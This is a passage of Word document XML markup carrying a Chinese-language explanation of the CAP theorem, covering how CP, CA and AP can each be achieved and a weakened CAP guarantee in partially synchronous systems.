      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是指所有的写和读都必须成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要回答这个问题，我们可以仔细思考下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>什么是成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>必须要相对于某个参照而言，这里的参照就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">CAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理论说在一个系统中对某个数据不存在一个算法同时满足</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consistency, Availability, Partition-tolerance </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>注意，这里边最重要和最容易被人忽视的是限定词</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对某个数据不存在一个算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。这就是说在一个系统中，可以对某些数据做到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CP, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对另一些数据做到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，就算是对同一个数据，调用者可以指定不同的算法，某些算法可以做到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，某些算法可以做</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要做到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统可以把这个数据只放在一个节点上，其他节点收到请求后向这个节点读或写数据，并返回结果。很显然，串行化是保证的。但是如果报文可以任意丢失的话，接受请求的节点就可能永远不返回结果。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要做到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一个现实的例子就是单点的数据库。你可能会疑惑</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库也不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100% </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可用的呀？</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要回答这个疑惑，注意上面说的故障模型和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> availability </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的定义就可以了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要做到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> AP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>系统只要每次对写都返回成功，对读都返回固定的某个值就可以了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果我们到这里就觉得已近掌握好</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理论了，那么就相当于刚把橘子剥开，就把它扔了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">CAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理论更重要的一个结果是，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Partial Synchronous System (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>半同步系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，一个弱化的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CAP </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是能达到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对所有的数据访问，总返回一个结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果期间没有报文丢失，那么返回一个满足</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> consistency </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>要求的结果。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
